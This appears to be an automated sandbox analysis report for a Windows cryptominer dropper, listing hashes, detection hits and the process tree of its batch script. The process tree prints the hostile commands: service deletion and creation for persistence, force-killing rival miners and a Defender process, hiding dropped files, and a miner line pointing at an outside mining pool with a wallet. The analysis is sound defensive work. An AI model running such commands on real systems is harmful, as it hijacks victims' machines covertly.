Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 10:26
Static task
static1
Behavioral task
behavioral1
Sample
5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
Resource
win7-20240220-en
General
-
Target
5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
-
Size
1.3MB
-
MD5
5e960ba61a82c5340650e2ce975bb4c9
-
SHA1
300aced1503b54d91e5508f0a210330e91b71b8a
-
SHA256
1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3
-
SHA512
9143b2172a13f1d36380bd7dc9875d21c994b9aaed71b3d3a094de23ff58b3ec64adb166b727b1a41574447cd67e30ec8992278fa78d0f3f42928e576e5d1fa1
-
SSDEEP
24576:jJlh9bDrRloua2E61y6ssIpCLpNwDfzhC8avIZej5O:jJp/FLrWpe8xChgZej5O
Malware Config
Signatures
-
XMRig Miner payload 14 IoCs
resource yara_rule behavioral2/files/0x000700000002346b-21.dat xmrig behavioral2/memory/4040-24-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-25-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-27-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-28-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-29-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-30-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-31-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-32-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-33-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-34-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-35-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-36-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral2/memory/4040-37-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig -
Creates new service(s) 2 TTPs
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3944 attrib.exe 1284 attrib.exe 4164 attrib.exe 3616 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe -
Executes dropped EXE 2 IoCs
pid Process 1648 mscorsvw.exe 4040 svchost.exe -
resource yara_rule behavioral2/files/0x0007000000023469-11.dat vmprotect behavioral2/memory/1648-13-0x0000000000400000-0x000000000055E000-memory.dmp vmprotect behavioral2/memory/1648-14-0x0000000000400000-0x000000000055E000-memory.dmp vmprotect behavioral2/memory/1648-26-0x0000000000400000-0x000000000055E000-memory.dmp vmprotect -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\debug\wkde 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\Windows\debug\wkde\mscorsvw.ini 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File created C:\Windows\debug\wkde\svchost.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\Windows\debug\wkde\svchost.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.exe attrib.exe File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.ini attrib.exe File created C:\Windows\debug\__tmp_rar_sfx_access_check_240601796 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File created C:\Windows\debug\wkde\mscorsvw.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log mscorsvw.exe File opened for modification C:\WINDOWS\Debug\wkde\svchost.exe attrib.exe File created C:\Windows\debug\wkde\mscorsvw.ini 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File created C:\Windows\debug\wkde\wk.bat 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\Windows\debug\wkde\wk.bat 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log attrib.exe File created C:\WINDOWS\Debug\wkde\mscorsvw.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\Windows\debug\wkde\mscorsvw.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1352 sc.exe 1280 sc.exe 2540 sc.exe 3560 sc.exe 3224 sc.exe 3944 sc.exe 1040 sc.exe 940 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 15 IoCs
pid Process 628 taskkill.exe 4376 taskkill.exe 4552 taskkill.exe 3844 taskkill.exe 4744 taskkill.exe 4748 taskkill.exe 3220 taskkill.exe 4792 taskkill.exe 2268 taskkill.exe 4588 taskkill.exe 4284 taskkill.exe 4896 taskkill.exe 544 taskkill.exe 1924 taskkill.exe 2224 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1236 PING.EXE 3100 PING.EXE -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 4896 taskkill.exe Token: SeDebugPrivilege 4552 taskkill.exe Token: SeDebugPrivilege 4792 taskkill.exe Token: SeDebugPrivilege 2268 taskkill.exe Token: SeDebugPrivilege 3844 taskkill.exe Token: SeDebugPrivilege 4588 taskkill.exe Token: SeDebugPrivilege 544 taskkill.exe Token: SeDebugPrivilege 4284 taskkill.exe Token: SeDebugPrivilege 628 taskkill.exe Token: SeDebugPrivilege 4376 taskkill.exe Token: SeDebugPrivilege 3220 taskkill.exe Token: SeDebugPrivilege 1924 taskkill.exe Token: SeDebugPrivilege 4744 taskkill.exe Token: SeDebugPrivilege 2224 taskkill.exe Token: SeDebugPrivilege 4748 taskkill.exe Token: SeLockMemoryPrivilege 4040 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1376 wrote to memory of 4320 1376 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe 83 PID 1376 wrote to memory of 4320 1376 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe 83 PID 1376 wrote to memory of 4320 1376 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe 83 PID 4320 wrote to memory of 940 4320 cmd.exe 87 PID 4320 wrote to memory of 940 4320 cmd.exe 87 PID 4320 wrote to memory of 940 4320 cmd.exe 87 PID 4320 wrote to memory of 1352 4320 cmd.exe 88 PID 4320 wrote to memory of 1352 4320 cmd.exe 88 PID 4320 wrote to memory of 1352 4320 cmd.exe 88 PID 4320 wrote to memory of 1280 4320 cmd.exe 89 PID 4320 wrote to memory of 1280 4320 cmd.exe 89 PID 4320 wrote to memory of 1280 4320 cmd.exe 89 PID 4320 wrote to memory of 2540 4320 cmd.exe 90 PID 4320 wrote to memory of 2540 4320 cmd.exe 90 PID 4320 wrote to memory of 2540 4320 cmd.exe 90 PID 4320 wrote to memory of 3560 4320 cmd.exe 91 PID 4320 wrote to memory of 3560 4320 cmd.exe 91 PID 4320 wrote to memory of 3560 4320 cmd.exe 91 PID 4320 wrote to memory of 3224 4320 cmd.exe 92 PID 4320 wrote to memory of 3224 4320 cmd.exe 92 PID 4320 wrote to memory of 3224 4320 cmd.exe 92 PID 4320 wrote to memory of 3944 4320 cmd.exe 93 PID 4320 wrote to memory of 3944 4320 cmd.exe 93 PID 4320 wrote to memory of 3944 4320 cmd.exe 93 PID 4320 wrote to memory of 4896 4320 cmd.exe 94 PID 4320 wrote to memory of 4896 4320 cmd.exe 94 PID 4320 wrote to memory of 4896 4320 cmd.exe 94 PID 4320 wrote to memory of 4552 4320 cmd.exe 98 PID 4320 wrote to memory of 4552 4320 cmd.exe 98 PID 4320 wrote to memory of 4552 4320 cmd.exe 98 PID 4320 wrote to memory of 4792 4320 cmd.exe 99 PID 4320 wrote to memory of 4792 4320 cmd.exe 99 PID 4320 wrote to memory of 4792 4320 cmd.exe 99 PID 4320 wrote to memory of 2268 4320 cmd.exe 100 PID 4320 wrote to memory of 2268 4320 cmd.exe 100 PID 4320 wrote to memory of 2268 4320 cmd.exe 100 PID 4320 wrote to memory of 3844 4320 cmd.exe 101 PID 4320 wrote to memory of 3844 4320 cmd.exe 101 PID 4320 wrote to memory of 3844 4320 cmd.exe 101 PID 4320 wrote to memory of 4588 4320 cmd.exe 102 PID 4320 wrote to memory of 4588 4320 cmd.exe 102 PID 4320 wrote to memory of 4588 4320 cmd.exe 102 PID 4320 wrote to memory of 544 4320 cmd.exe 103 PID 4320 wrote to memory of 544 4320 cmd.exe 103 PID 4320 wrote to memory of 544 4320 cmd.exe 103 PID 4320 wrote to memory of 4284 4320 cmd.exe 104 PID 4320 wrote to memory of 4284 4320 cmd.exe 104 PID 4320 wrote to memory of 4284 4320 cmd.exe 104 PID 4320 wrote to memory of 628 4320 cmd.exe 105 PID 4320 wrote to memory of 628 4320 cmd.exe 105 PID 4320 wrote to memory of 628 4320 cmd.exe 105 PID 4320 wrote to memory of 4376 4320 cmd.exe 106 PID 4320 wrote to memory of 4376 4320 cmd.exe 106 PID 4320 wrote to memory of 4376 4320 cmd.exe 106 PID 4320 wrote to memory of 4508 4320 cmd.exe 107 PID 4320 wrote to memory of 4508 4320 cmd.exe 107 PID 4320 wrote to memory of 4508 4320 cmd.exe 107 PID 4508 wrote to memory of 4144 4508 net.exe 108 PID 4508 wrote to memory of 4144 4508 net.exe 108 PID 4508 wrote to memory of 4144 4508 net.exe 108 PID 4320 wrote to memory of 1236 4320 cmd.exe 109 PID 4320 wrote to memory of 1236 4320 cmd.exe 109 PID 4320 wrote to memory of 1236 4320 cmd.exe 109 PID 4320 wrote to memory of 3220 4320 cmd.exe 115 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 3616 attrib.exe 3944 attrib.exe 1284 attrib.exe 4164 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\WINDOWS\Debug\wkde\wk.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\SysWOW64\sc.exesc delete Systemss3⤵
- Launches sc.exe
PID:940
-
-
C:\Windows\SysWOW64\sc.exesc delete WMIserver3⤵
- Launches sc.exe
PID:1352
-
-
C:\Windows\SysWOW64\sc.exesc delete WMIservers3⤵
- Launches sc.exe
PID:1280
-
-
C:\Windows\SysWOW64\sc.exesc delete WMI3⤵
- Launches sc.exe
PID:2540
-
-
C:\Windows\SysWOW64\sc.exesc delete Serv3⤵
- Launches sc.exe
PID:3560
-
-
C:\Windows\SysWOW64\sc.exesc delete system_update3⤵
- Launches sc.exe
PID:3224
-
-
C:\Windows\SysWOW64\sc.exesc delete system_updatea3⤵
- Launches sc.exe
PID:3944
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolsvs.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NsCpuapl.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MSASCui.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nheqminer_zcash.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nssm.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im update.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im server.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sppscv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
C:\Windows\SysWOW64\net.exenet stop wkde3⤵
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wkde4⤵PID:4144
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.13⤵
- Runs ping.exe
PID:1236
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mscorsvw.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im WUDFHost.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im nheqminer.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NsCpuCNMiner32.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NsCpuCNMiner64.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.13⤵
- Runs ping.exe
PID:3100
-
-
C:\Windows\SysWOW64\sc.exesc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto3⤵
- Launches sc.exe
PID:1040
-
-
C:\Windows\SysWOW64\net.exenet start wkde3⤵PID:1376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start wkde4⤵PID:4540
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:3944
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:1284
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:4164
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:3616
-
-
-
C:\WINDOWS\Debug\wkde\mscorsvw.exeC:\WINDOWS\Debug\wkde\mscorsvw.exe1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1648 -
C:\WINDOWS\Debug\wkde\svchost.exeC:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
397B
MD5d298cd48c88433017ef4e66af740830e
SHA1e0ef455dc4df16948d85c5a058d0980ce5020822
SHA256b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89
SHA5125927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe
-
Filesize
244B
MD50a98d172405546d83c748505a590f268
SHA10a107d99277cc976260d59d60ea2e513a5280688
SHA256cb4075e76b795f5a464a50114628b2d62e3546aa9735a0ebffef29b3e94bdcac
SHA51289c091858c44cd0055a33de6fd89b20f0735bdb071f03158b76ae312af8901827f3fd26c3c7f12cfe777e42f1d4f7874da30770b3ebcb4fadd79543d100af0ef
-
Filesize
884B
MD5816d97b2dca2af96209ef913291d59be
SHA1a3c480a7e333a1623e7cd8194d68468397c3f6d1
SHA256ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d
SHA51254bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088
-
Filesize
684KB
MD5cbb4ca806e69a4880dd02e04e5bce18b
SHA11e838ddad7b04a1f2be935f6fe8e7cff3466c4d7
SHA2562cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b
SHA5126240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6
-
Filesize
687KB
MD579a1ec8d32e8e3032b5f5126c11f2216
SHA186dc55fcdc358a5c6699c41582b66b75bedc4086
SHA256d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8
SHA512a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106